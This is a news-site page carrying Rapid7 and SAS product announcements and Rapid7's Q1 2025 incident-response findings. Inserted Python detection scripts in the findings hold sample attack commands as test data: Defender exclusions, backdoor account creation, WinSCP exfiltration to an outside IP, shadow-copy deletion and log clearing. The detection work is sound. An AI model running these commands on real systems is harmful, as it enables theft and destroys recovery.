
Rapid7 unveils platform to help SOC teams cut through alert noise
Rapid7 has launched Intelligence Hub, a platform intended to equip security teams with actionable intelligence and contextual insights for improved threat detection and response.
The introduction of Intelligence Hub comes amid increasing challenges faced by security teams, with a recent survey indicating that two-thirds of Security Operations Centre (SOC) analysts have experienced a significant rise in the number of security alerts over the past three years. Additionally, 70% of respondents reported a substantial increase in the number of security tools they are required to use.
Intelligence Hub seeks to address industry issues such as fragmented intelligence platforms, lack of contextual information, and difficulties in prioritising security threats. The platform curates data from multiple sources, including Rapid7's proprietary honeypot network and research, as well as open-source communities. According to the company, a particular focus is placed on verifying low-prevalence, high-impact indicators to reduce the occurrence of false positives.
This curated intelligence is available directly in the Rapid7 Command Platform, which enables analysts to incorporate relevant threat information within their existing workflows. The system aims to help teams prioritise the most significant threats and accelerate remediation activities.
Raj Samani, Chief Scientist at Rapid7, commented: "Security organisations are drowning in noise, making timely responses to threats nearly impossible. Intelligence Hub addresses this challenge by focusing on curated intelligence, providing only the most relevant and verified indicators to enable rapid and effective action."
Intelligence Hub offers features designed to help security teams contextualise threats based on the specific industry sector, geographical location, exposure to vulnerabilities, and the tactics and techniques used by threat actors. Rapid7 says its methodology for attributing threats is clearly defined, which is intended to support targeted mitigation strategies and improved resource allocation.
The platform is structured to integrate with existing security tools, including Rapid7's next-generation Security Information and Event Management (SIEM) solution, InsightIDR. By delivering intelligence within established tools, Rapid7 aims to reduce the need for analysts to switch contexts during investigations, potentially leading to faster and more accurate responses.
The company states that Intelligence Hub prioritises the most relevant threats by analysing active attacker campaigns, sector-specific targeting, and exploitability. The intelligence is curated by Rapid7 Labs researchers, combining honeypot data, open-source information, and internal research. The intention is to present security teams with high-fidelity alerts that are most likely to be actionable.
Monika Soltysik, Senior Research Manager at IDC, highlighted some of the broader challenges in the threat intelligence market: "In IDC's October 2024 survey of U.S. organisations, the top three challenges with threat intelligence solutions were cost (42.2%), false positives and alert fatigue (40.0%), and data quality and reliability (39.7%). Solution providers that are proactively addressing these challenges, like Rapid7, are making it easier for their customers to understand and secure their attack surface."
Rapid7 positions Intelligence Hub as a proactive tool for helping organisations cut through data overload, reduce noise, and ensure that resources are allocated to managing verifiable and relevant security threats.
Related Articles


Techday NZ, 18 minutes ago
SAS launches AI models after USD $1 billion investment push
SAS has released a set of artificial intelligence models targeting business processes that are traditionally labour-intensive and time-consuming. The launch is part of a USD $1 billion investment by SAS in industry-focused data and AI solutions intended to streamline specific business bottlenecks. The newly introduced models are designed either for immediate deployment or to serve as a foundation that organisations can quickly customise, enabling faster model training on internal data. SAS states that these packaged models are compatible with existing systems and suitable for organisations regardless of size.

Model Applications

The available models span several industries. For cross-industry use, SAS has presented AI-Driven Entity Resolution and Document Analysis. Within health care, there is a model focused on Medication Adherence Risk, while manufacturing clients have access to Strategic Supply Chain Optimisation. Public sector releases include Payment Integrity for Food Assistance and Tax Compliance for Sales Tax. SAS has indicated that each model was developed according to its Data Ethics Practice guidelines. According to the company, this ensures the resulting outputs are easy for organisations to understand and explain. SAS asserts that users can improve productivity and return on investment as a result of deploying these solutions, while maintaining an adherence to principles of responsible use. Kathy Lange, Research Director at IDC, commented on the nature and flexibility of the SAS Models portfolio. She said, "SAS Models are based on SAS' core assets, talent and intellectual property from its wealth of experience working with customers to solve industry problems. Between its scalability and seamless integration with existing environments, SAS Models are a great option for those looking to accelerate time to production who might lack the expertise or time to build models from scratch."

Future Roadmap

In addition to the models now available, SAS outlined plans for expanding its industry-specific AI library. Scheduled for later in 2025 are new models addressing needs in banking (Fraud Decisioning for Payments and Card Models), health care (Payment Integrity for HealthCare), manufacturing (Worker Safety Monitoring) and the public sector (Tax Compliance for Individual Income Tax). SAS also announced it is working on "agentic" versions of its models, designed to increase autonomy within business-specific AI solutions. According to SAS, these forthcoming agentic offerings will aim to further reshape operational efficiency by introducing pre-built agents capable of automating complex data preparation processes.

Data Preparation Solution

The challenge of preparing large volumes of raw data so that it is suitable for AI model training is significant for many organisations. Data scientists often spend extended periods building and refining data lakes—repositories that structure raw customer data for analysis. SAS is responding to this challenge with an AI agent designed to automate complex data preparation processes, thereby facilitating real-time model operation with minimal manual intervention. "We believe the future of AI lies in agents that are not only intelligent but also responsible, ready-to-use and relevant," said Udo Sglavo, VP of Applied AI and Modeling, R&D at SAS. "Our new industry-specific models, built on decades of domain expertise and guided by our ethics-first approach, represent a bold step toward agentic AI: solutions that think with context, act with purpose and deliver real-world impact."

Delivery and Integration

SAS reports that organisations implementing its models have access to clear, simplified documentation intended to support transparent and responsible use. Each model can be tailored to meet sector-specific requirements and can supplement existing IT and business infrastructures.
The release of these new AI models represents the latest step in SAS' long-term development strategy, continuing its aim to address evolving customer priorities across a range of sectors.


Techday NZ, 18 minutes ago
SAS Viya unveils new AI tools & services to boost productivity
SAS has announced a series of updates and new features on its SAS Viya platform, aimed at enhancing AI-driven productivity and supporting a wider range of users and organisations.

Platform updates

The SAS Viya platform now provides users with the ability to either build AI through a suite of end-to-end tools or purchase AI solutions and model packages, offering increased flexibility and productivity for decision-making across industries. Kathy Lange, Research Director for AI Software at IDC, commented, "SAS is evolving its strategy and portfolio to embrace a broader ecosystem of user personas, preferences, and technologies within an enterprise's AI technology stack. SAS continues to develop offerings that streamline and automate the AI life cycle and enable organisations to make better business decisions faster."

Key releases

SAS Data Maker, first introduced through a private preview, is a synthetic data generator designed to help organisations address challenges related to data privacy and scarcity. The tool also aims to simplify data management processes and reduce resource usage. The development of SAS Data Maker was accelerated by SAS's recent acquisition of principal software assets from Hazy, a specialist in synthetic data. General availability for SAS Data Maker is expected in the third quarter of 2025. SAS Viya Intelligent Decisioning, which is currently available, offers organisations the ability to create and deploy intelligent AI agents with a controlled mix of AI autonomy and human involvement. According to SAS, this is intended to ensure appropriate oversight for tasks with varied complexity and risk profiles. Another new addition is SAS Managed Cloud Services: SAS Viya Essentials. This service packages selected SAS Viya products into an out-of-the-box managed cloud environment. Initially targeted at small and medium-sized businesses, SAS Managed Cloud Services: Viya Essentials is intended to reduce barriers to adopting AI solutions by providing an accessible hosted service. The SAS Viya Copilot, an AI-powered conversational assistant, is built into the SAS Viya platform to support developers, data scientists, and business users with analytical, business, and industry tasks. Currently available by invitation through a private preview, the general release is scheduled for the third quarter of 2025. The Copilot offers AI-powered assistance with model development and coding for SAS users. It is built on Azure AI Services, reflecting the ongoing partnership between SAS and Microsoft. SAS Viya Workbench, originally launched in 2024, is a cloud-based environment intended for developers, data scientists, and modellers. The workbench supports coding in SAS and Python via Visual Studio Code or Jupyter Notebook. Updates in 2025 include the addition of R language support, the integration of SAS Enterprise Guide as an optional development environment, and expanded availability to the Microsoft Azure Marketplace in addition to the existing AWS Marketplace.

AI in practice

SAS has reported that organisations using the Viya platform benefit from the ability to build and deploy AI models more efficiently. The platform's structure allows multiple job functions—including developers, data scientists, IT professionals, and business analysts—to collaborate throughout the data and AI life cycle. SAS suggests this collaboration streamlines the path to making informed business decisions and accelerates productivity across various sectors and regulatory contexts. Referencing industry research, SAS cited a 2024 AI productivity study by Futurum Group: "SAS Viya helps users accelerate the AI life cycle, enabling them to collect data, build models, and deploy decisions 4.6 times faster than selected competitors – all while helping them increase innovation, expedite decision making and drive revenue growth." "The current economic climate and rapid pace of AI innovation can feel intense and overwhelming," said Bryan Harris, Chief Technology Officer at SAS. "Our goal is to deliver cutting-edge AI capabilities that help organisations navigate the hype and disruption, make breakthroughs in problem solving, and gain a decision advantage."

Real world usage

SAS highlighted the use of its platform by Fathom Science, a start-up focused on marine data analytics. Fathom Science used SAS Data Maker to generate synthetic shipping lane data, expanding their dataset to 500,000 points, in order to validate a model designed to predict whale locations and reduce the risk of vessel strikes on critically endangered North Atlantic right whales. SAS Viya Workbench was used subsequently to develop machine learning models for calculating the probability of whales' proximity to shore, assisting with statistical and machine learning validation of the location prediction model. SAS stated that through these enhancements, the Viya platform aims to support a diverse range of users in addressing real business and environmental challenges efficiently with AI-driven solutions.


Techday NZ, 4 days ago
Rapid7 Q1 2025 incident response findings
Rapid7's Q1 2025 incident response data highlights several key initial access vector (IAV) trends, shares salient examples of incidents investigated by the Rapid7 Incident Response (IR) team, and digs into threat data by industry as well as some of the more commonly seen pieces of malware appearing in incident logs. Is having no MFA solution in place still one of the most appealing vulnerabilities for threat actors? Will you see the same assortment of malware regardless of whether you work in business services or media and communications? And how big a problem could one search engine query possibly be, anyway? The answer to that last question is "very," as it turns out. As for the rest…

Initial access vectors

Below, we highlight the key movers and shakers for IAVs across cases investigated by Rapid7's IR team. While you'll notice a fairly even split among several vectors such as exposed remote desktop protocol (RDP) services and SEO poisoning, one in particular is clearly the leader of the pack where compromising organisations is concerned: stolen credentials to valid/active accounts with no multi-factor authentication (MFA) enabled. Valid account credentials, with no MFA in place to protect the organisation should they be misused, are still far and away the biggest stumbling block for organisations investigated by the Rapid7 IR team, occurring in 56% of all incidents this first quarter. Exposed remote monitoring and management (RMM) tooling accounted for 6% of incidents as the IAV, yet RMM tools were abused by attackers more generally in 44% of incidents. This tells us that third parties remain an important consideration in an organisation's security hygiene.

Valid accounts / no MFA: Top of the class

Rapid7 regularly bangs the drum for tighter controls where valid accounts and MFA are concerned. As per the key findings, 56% of all incidents in Q1 2025 involved valid accounts / no MFA as the initial access vector.
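The finding above is only actionable if you can see which successful logons completed without a second factor, and from where. The following is an added example (not Rapid7's code or data) that scores such logons from a constructed JSON-lines authentication log; the field names `ts`, `user`, `result`, `mfa`, `src_ip` and `service`, the internal address ranges, and the sample records are all assumptions to adapt to your own SIEM schema.

```python
"""Flag successful logons that used a valid account without MFA.

Added example, not Rapid7 code. It assumes a JSON-lines authentication log
with the fields ts, user, result, mfa, src_ip and service; the records below
are constructed, and real SIEM field names will differ.
"""
import ipaddress
import json
from collections import defaultdict

# Constructed sample log. 203.0.113.0/24 and 198.51.100.0/24 are documentation
# ranges standing in for internet sources.
SAMPLE_LOG = """\
{"ts": "2025-02-03T08:01:10Z", "user": "j.doe",      "result": "success", "mfa": true,  "src_ip": "10.20.5.14",   "service": "vpn"}
{"ts": "2025-02-03T08:04:52Z", "user": "svc_backup", "result": "success", "mfa": false, "src_ip": "10.20.5.20",   "service": "rdp"}
{"ts": "2025-02-03T23:17:03Z", "user": "svc_backup", "result": "failure", "mfa": false, "src_ip": "203.0.113.77", "service": "rdp"}
{"ts": "2025-02-03T23:17:09Z", "user": "svc_backup", "result": "success", "mfa": false, "src_ip": "203.0.113.77", "service": "rdp"}
{"ts": "2025-02-04T02:40:41Z", "user": "a.smith",    "result": "success", "mfa": false, "src_ip": "198.51.100.9", "service": "owa"}
{"ts": "2025-02-04T09:12:00Z", "user": "a.smith",    "result": "success", "mfa": true,  "src_ip": "10.20.7.3",    "service": "owa"}
"""

# Assumed internal address space; anything else is treated as internet-facing.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_events(text):
    """One JSON object per line, blank lines ignored."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def find_no_mfa_logons(events):
    """Return every successful logon that completed without MFA.

    Severity: high if the source is external (the exposed-service case),
    medium if it is internal but new for this user, low otherwise.
    Events are assumed to be in time order.
    """
    seen = defaultdict(set)  # user -> source IPs with an earlier successful logon
    findings = []
    for ev in events:
        if ev["result"] != "success":
            continue
        user, ip = ev["user"], ev["src_ip"]
        if not ev["mfa"]:
            if is_external(ip):
                severity = "high"
            elif ip not in seen[user]:
                severity = "medium"
            else:
                severity = "low"
            findings.append({"ts": ev["ts"], "user": user, "src_ip": ip,
                             "service": ev["service"], "severity": severity})
        seen[user].add(ip)
    return findings


def no_mfa_share(events):
    """Fraction of successful logons that had no MFA (0.0 if none succeeded)."""
    successes = [ev for ev in events if ev["result"] == "success"]
    if not successes:
        return 0.0
    return sum(1 for ev in successes if not ev["mfa"]) / len(successes)


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    for f in find_no_mfa_logons(evs):
        print(f"{f['severity']:<6} {f['ts']} {f['user']:<11} {f['service']:<4} from {f['src_ip']}")
    print(f"{no_mfa_share(evs):.0%} of successful logons had no MFA")
```

On the sample data the service account's RDP logon from an internet address is the high-severity hit; the preceding failure from the same address is the kind of context worth joining in when you tune this for real logs. The `no_mfa_share` figure is the metric to track over time, since the blog's point is that it has barely moved in three quarters.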
Looking back, there's been very little change in this figure since Q3 2024, and as good as no difference between the last two quarters.

Vulnerability exploitation: Cracks in the armour

Rapid7's IR services team observed several vulnerabilities used, or likely to have been used, as an IAV in Q1 2025. CVE-2024-55591, for example, the IAV for an incident in manufacturing, is a websocket-based race condition authentication bypass affecting Fortinet's FortiOS and FortiProxy flagship appliances. Successful exploitation results in the ability to execute arbitrary CLI console commands as the super_admin user. The CVE-2024-55591 advisory was published at the beginning of 2025, and the flaw saw widespread exploitation in the wild. One investigation revealed attackers using it to compromise vulnerable firewall devices and create local and administrator accounts with legitimate-looking names (e.g., references to "Admin", "I.T.", "Support"). This allowed access to firewall dashboards, which may have contained useful information about the devices' users, configurations, and network traffic. Policies were created which allowed for leveraging of remote VPN services, and the almost month-long dwell time observed in similar incidents may suggest initial access broker (IAB) activity, or a possible intended progression to data exfiltration and ransomware.

Exposed RMM tooling: A path to ransomware

As noted above, 6% of IAV incidents were a result of exposed remote monitoring and management (RMM) tooling. RMMs, used to remotely manage and access devices, are often used to gain initial access, or form part of the attack chain leading to ransomware. One investigation revealed a version of SimpleHelp vulnerable to several critical privilege escalation and remote code execution vulnerabilities, including CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728. These CVEs affect the SimpleHelp remote access solution.
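The FortiGate intrusion described under "Vulnerability exploitation" above has a detectable shape in the appliance's own event log: an administrator account with a benign-looking name is created from an unexpected source, and shortly afterwards that new account adds firewall policies or edits VPN settings. The following is an added example (not Rapid7's or Fortinet's code) that looks for exactly that sequence. The key=value layout and the attribute names `action`, `cfgpath`, `cfgobj`, `ui` and `user` follow FortiOS system event logs as the author understands them; the log lines, the management network and the decoy-name pattern are constructed assumptions, so check them against your own device's output before relying on them.

```python
"""Detect the FortiGate post-exploitation pattern above: administrator accounts
with benign-looking names created from outside the management network, then
firewall/VPN policy changes made by those new accounts.

Added example, not Rapid7 or Fortinet code. The key=value layout and the
attribute names (action, cfgpath, cfgobj, ui, user) follow FortiOS system
event logs as the author understands them; the log lines, the management
network and the decoy-name pattern are constructed assumptions to adapt.
"""
import ipaddress
import re

# Constructed sample lines; 203.0.113.50 stands in for an internet source.
SAMPLE_LOG = """\
date=2025-01-20 time=03:12:41 logid="0100044547" type="event" subtype="system" level="information" user="admin" ui="https(203.0.113.50)" action="Add" cfgpath="system.admin" cfgobj="Support" msg="Add system.admin Support"
date=2025-01-20 time=03:13:05 logid="0100044547" type="event" subtype="system" level="information" user="admin" ui="https(203.0.113.50)" action="Add" cfgpath="user.local" cfgobj="I.T." msg="Add user.local I.T."
date=2025-01-20 time=03:15:22 logid="0100044547" type="event" subtype="system" level="information" user="Support" ui="https(203.0.113.50)" action="Add" cfgpath="firewall.policy" cfgobj="99" msg="Add firewall.policy 99"
date=2025-01-20 time=03:16:01 logid="0100044547" type="event" subtype="system" level="information" user="Support" ui="https(203.0.113.50)" action="Edit" cfgpath="vpn.ssl.settings" cfgobj="" msg="Edit vpn.ssl.settings"
date=2025-01-21 time=09:00:12 logid="0100044547" type="event" subtype="system" level="information" user="netops" ui="ssh(10.0.0.5)" action="Edit" cfgpath="system.interface" cfgobj="port1" msg="Edit system.interface port1"
"""

KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
MGMT_NETS = [ipaddress.ip_network("10.0.0.0/8")]  # assumed: where admins legitimately log in from
DECOY_NAME_RE = re.compile(r"(?i)^(admin|it|i\.t\.|support|helpdesk)[\w.-]*$")
ACCOUNT_PATHS = ("system.admin", "user.local")
POLICY_PREFIXES = ("firewall.policy", "vpn.")


def parse_line(line):
    """key=value pairs, quotes stripped."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def ui_source_ip(ui):
    """'https(203.0.113.50)' -> '203.0.113.50'; None when no address is present."""
    m = re.search(r"\(([\d.]+)\)", ui)
    return m.group(1) if m else None


def from_management_net(ip):
    return ip is not None and any(ipaddress.ip_address(ip) in net for net in MGMT_NETS)


def analyse(text):
    """Return alerts in log order: one per account creation, plus one per
    policy/VPN change made by an admin account created earlier in the log."""
    events = [parse_line(line) for line in text.splitlines() if line.strip()]
    new_admins = set()
    alerts = []
    for ev in events:
        when = f"{ev.get('date')} {ev.get('time')}"
        src = ui_source_ip(ev.get("ui", ""))
        cfgpath = ev.get("cfgpath", "")
        if ev.get("action") == "Add" and cfgpath in ACCOUNT_PATHS:
            name = ev.get("cfgobj", "")
            reasons = []
            if not from_management_net(src):
                reasons.append("created from outside the management network")
            if DECOY_NAME_RE.match(name):
                reasons.append("decoy-style account name")
            if cfgpath == "system.admin":
                new_admins.add(name)
            alerts.append({"time": when, "rule": "account-created", "account": name,
                           "by": ev.get("user"), "src": src,
                           "severity": "high" if reasons else "info", "reasons": reasons})
        elif cfgpath.startswith(POLICY_PREFIXES) and ev.get("user") in new_admins:
            alerts.append({"time": when, "rule": "policy-change-by-new-admin",
                           "account": ev.get("user"), "by": ev.get("user"), "src": src,
                           "severity": "critical", "reasons": [f"{ev.get('action')} {cfgpath}"]})
    return alerts


if __name__ == "__main__":
    for a in analyse(SAMPLE_LOG):
        print(f"{a['time']} {a['severity']:<8} {a['rule']:<26} {a['account']!r} by {a['by']} from {a['src']}: {'; '.join(a['reasons'])}")
```

Every `system.admin` creation is worth an alert on its own (they are rare on a well-run firewall), which is why the rule emits an `info` entry even when neither heuristic fires; the escalation to `critical` happens when the freshly created admin starts touching firewall policy or SSL-VPN settings, the step that opened remote VPN access in the incident above.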
Exploiting CVE-2024-57727 permits an unauthenticated attacker to leak SimpleHelp "technician" password hashes. If one is cracked, the attacker can log in as a remote-access technician. The attacker can then exploit CVE-2024-57726 and CVE-2024-57728 to elevate to SimpleHelp administrator and trigger remote code execution, respectively. CVE-2024-57727 was added to CISA KEV in February 2025. The vulnerable RMM solution was used to gain initial access, and the threat actors used PowerShell to create Windows Defender exclusions, with the ultimate goal of deploying INC Ransomware on target systems.

SEO poisoning: When a quick search leads to disaster

SEO poisoning, once the scourge of search engines everywhere, may not be high on your list of priorities. However, it still has the potential to wreak havoc on a network. Here, the issue isn't so much rogue entries in regular search results, but instead the paid sponsored ads directly above typical searches. Note how many sponsored results sit above the genuine site related to this incident:

(Figure: multiple sponsored searches above the official (and desired) search result)

This investigation revealed a tale of two search results, where one led to a genuine download of a tool designed to monitor virtual environments, and the other led to malware. When faced with both options, a split-second decision went with the latter, and what followed was an escalating series of intrusion, data exfiltration and, eventually, ransomware.

(Figure: an imitation website offering malware disguised as genuine software)

On the same day as the initial compromise, the attacker moved laterally using compromised credentials via RDP, installing several RMM tools such as AnyDesk and SplashTop. It is likely that the threat actor searched for insecurely stored password files and targeted password managers.
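Both intrusions above, the SimpleHelp case (PowerShell-created Defender exclusions) and the SEO-poisoning case (RMM tools dropped after the initial foothold), leave the same kind of evidence: process-creation events with tell-tale command lines. The following is an added example (not Rapid7's code) that runs a small set of command-line rules over constructed Sysmon-style events and tags each hit with its ATT&CK technique. It goes beyond the two specific cases by also covering the local account creation, shadow-copy deletion, event-log clearing and WinSCP transfers that commonly precede ransomware deployment. The event shape (`host`, `user`, `parent`, `image`, `cmdline`), the sample events and the regexes are all assumptions; the regexes are starting points, not a complete rule set.

```python
"""Match process-creation events against post-exploitation behaviours:
PowerShell-created Defender exclusions, RMM tool installs, local account
creation, shadow-copy deletion, event-log clearing and WinSCP transfers,
each tagged with its ATT&CK technique.

Added example, not Rapid7 code. The events are constructed in a Sysmon-like
shape (host, user, parent, image, cmdline); the regexes are starting points.
"""
import re

SAMPLE_EVENTS = [  # constructed; one intrusion on WS-FIN-07 plus a benign event elsewhere
    {"ts": "2025-02-10T10:02:11Z", "host": "WS-FIN-07", "user": "CORP\\j.doe", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\j.doe\Downloads\AnyDesk.exe",
     "cmdline": r'"C:\Users\j.doe\Downloads\AnyDesk.exe" --install "C:\Program Files\AnyDesk" --silent'},
    {"ts": "2025-02-10T10:05:40Z", "host": "WS-FIN-07", "user": "CORP\\j.doe", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\svc'"},
    {"ts": "2025-02-10T10:06:02Z", "host": "WS-FIN-07", "user": "CORP\\j.doe", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\net.exe", "cmdline": r"net user helpdesk P@ssw0rd! /add"},
    {"ts": "2025-02-10T11:30:15Z", "host": "WS-FIN-07", "user": "CORP\\j.doe", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Tools\WinSCP.com",
     "cmdline": r'"C:\Tools\WinSCP.com" /command "open sftp://u@203.0.113.10" "put C:\Finance\*" "exit"'},
    {"ts": "2025-02-10T14:01:00Z", "host": "WS-FIN-07", "user": "NT AUTHORITY\\SYSTEM", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\vssadmin.exe", "cmdline": r"vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2025-02-10T14:01:03Z", "host": "WS-FIN-07", "user": "NT AUTHORITY\\SYSTEM", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wevtutil.exe", "cmdline": r"wevtutil.exe cl Security"},
    {"ts": "2025-02-10T09:00:00Z", "host": "WS-HR-02", "user": "CORP\\m.lee", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": r"powershell.exe Get-MpPreference"},
]

# (rule name, ATT&CK technique, pattern applied to the command line)
RULES = [
    ("defender-exclusion-added", "T1562.001", re.compile(r"(?i)Add-MpPreference\b.*-Exclusion(Path|Process|Extension)")),
    ("rmm-tool-installed", "T1219", re.compile(r"(?i)\\(anydesk|splashtop\w*|teamviewer)[^\\\s]*\.exe")),
    ("local-account-created", "T1136.001", re.compile(r"(?i)\bnet1?(\.exe)?\s+user\s+\S+(\s+\S+)?\s+/add\b")),
    ("shadow-copies-deleted", "T1490", re.compile(r"(?i)\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)")),
    ("event-logs-cleared", "T1070.001", re.compile(r"(?i)\bwevtutil(\.exe)?\s+(cl|clear-log)\b")),
    ("winscp-transfer", "T1048", re.compile(r'(?i)winscp(\.com|\.exe)?"?\s.*(/command|/script|sftp://|scp://|ftps?://)')),
]


def match_events(events):
    """Return one hit per (event, rule) pair, in event order; an event may trip several rules."""
    hits = []
    for ev in events:
        for rule, technique, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                hits.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                             "rule": rule, "technique": technique, "cmdline": ev["cmdline"]})
    return hits


def chain_by_host(hits, threshold=3):
    """Hosts whose hits span at least `threshold` distinct techniques.

    Several distinct precursor behaviours on one host inside the window you
    feed in is a far stronger ransomware signal than any single rule firing.
    """
    per_host = {}
    for h in hits:
        per_host.setdefault(h["host"], set()).add(h["technique"])
    return {host: sorted(t) for host, t in per_host.items() if len(t) >= threshold}


if __name__ == "__main__":
    hits = match_events(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h['ts']} {h['host']} {h['technique']:<10} {h['rule']:<24} {h['cmdline']}")
    print("chains:", chain_by_host(hits))
```

Individually, some of these rules are noisy (administrators do run `net user /add` and install remote-support tools), which is why `chain_by_host` exists: the sample host trips six different techniques in a few hours, and that combination is what should page someone.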
The threat actor also attempted to modify and/or disable various security tools in order to evade detection, and created a local account to enable persistence and survive domain-wide password resets. An unauthorised copy of WinSCP was used to exfiltrate a few hundred GB of sensitive company data from several systems, and with this mission accomplished only a few tasks remained. The first: attempting to inhibit system recovery by tampering with the Volume Shadow Copy Service (VSS), clearing event logs, deleting files, and also attempting to target primary backups for data destruction. The second: deployment of Qilin ransomware and a blackmail note instructing the victim to communicate via a TOR link lest the data be published to their leak site. Qilin ranked seventh in our top ransomware groups of Q1 2025 for leak post frequency, racking up 111 posts from January through March. Known for double-extortion attacks across healthcare, manufacturing, and financial sectors, Qilin (who, despite their name, are known not to be Chinese speakers, but rather Russian-speaking) has also recently been seen deployed by the North Korean threat actor Moonstone Sleet.

Attacker behaviour observations

Bunnies everywhere: Tracking a top malware threat

BunnyLoader, the Malware as a Service (MaaS) loader possessing a wealth of capabilities including clipboard and credential theft, keylogging, and the ability to deploy additional malware, is one of the most prolific presences Rapid7 has seen this first quarter of 2025. In many cases, it's also daisy-chained to many of the other payloads and tactics which make repeated appearances. To really drive this message home: BunnyLoader is the most observed payload across almost every industry we focused on. Whether we're talking manufacturing, healthcare, business services or finance, it's typically well ahead of the rest of the pack.
Here are our findings across the 5 most targeted industries of Q1:

BunnyLoader is in pole position not only for the 5 industries shown above, but across 12 of 13 industries overall, with 40% of all incidents observed involving this oft-updated malware. Just over half of that 40% total involved a fake CAPTCHA (commonly used to trick victims into executing malicious code themselves), with malicious / compromised sites appearing in a quarter of BunnyLoader cases. Rogue documents, which may be booby-trapped with malware or pave the way for potential phishing attacks, bring up the rear at just 9% of all BunnyLoader appearances recorded. First offered for sale in 2023 for a lifetime-use cost of $250, its continued development and large range of features make it an attractive proposition for rogues operating on a budget.

Targeted organisations: The manufacturing magnet

Manufacturing organisations were targeted in more than 24% of incidents the Rapid7 IR team observed, by far the most targeted industry in Q1 based on both Rapid7's ransomware analytics and IR team observations. The chart below compares Rapid7's industry-wide data (comprising a wide range of payloads and tactics) with ransomware leak post specific data. In both cases, manufacturing is a fair way ahead of other industries; this reflects its status as one of the most popular targets for ransomware groups over the last couple of years. The manufacturing industry is an attractive target for nation states because it is an important component of global trade. It is also an area with a great deal of legacy and older operational technology (OT). Combine unpatched legacy systems with complicated supply chains, and you have a risk that nation state actors will find an attractive target. This is especially the case when considering that many manufacturing organisations have critical contracts with governments, and attacks can cause severe disruption if they're not speedily resolved.
Conclusion

Q1 2025 resembles a refinement of successful tactics, as opposed to brand new innovations brought to the table. Our Q1 ransomware analytics showed threat actors making streamlined tweaks to a well-oiled machine, and we find many of the same "evolution, not revolution" patterns occurring here. This progression is particularly applicable in the case of initial access via valid accounts with no MFA protection. We expect to see no drop in popularity while businesses continue to leave easy inroads open and available to skilled (and unskilled) attackers. In addition, the risk of severe compromise stemming from seemingly harmless online searches underscores the necessity for organisations to reexamine basic security best practices, alongside deploying robust detection and response capabilities. Businesses addressing these key areas for concern will be better equipped to defend against what should not be an inevitable slide into data exfiltration and malware deployment.